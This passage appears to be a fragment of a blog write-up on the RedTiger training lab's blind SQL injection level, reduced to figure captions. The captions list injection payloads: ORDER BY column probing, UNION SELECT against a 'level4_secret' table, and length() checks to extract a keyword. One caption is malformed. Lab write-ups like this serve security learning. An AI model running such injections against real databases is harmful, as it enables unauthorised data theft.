BLIND SQL INJECTION (redtiger.lab)-Part 3

fig 1: Response when order by 2
fig 2: Response when order by is 3
fig 3: using query id=1 union select 1,3,from level4_secret
fig 4: using query id=1 union select 1 from level4_secret
fig 5: 1 union select keyword,2 from level4_secret where length(keyword)>20
fig 6: 1 union select keyword,2 from level4_secret where length(keyword)>25
fig 7 : 1 union select keyword,2 from level4_secret where length(keyword)=21
fig 8: Output
fig 9: Successfully hacked

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
aayush malla

aayush malla

Data Engineer, Cybersecurity enthusiast , PLSQL, Data Analyst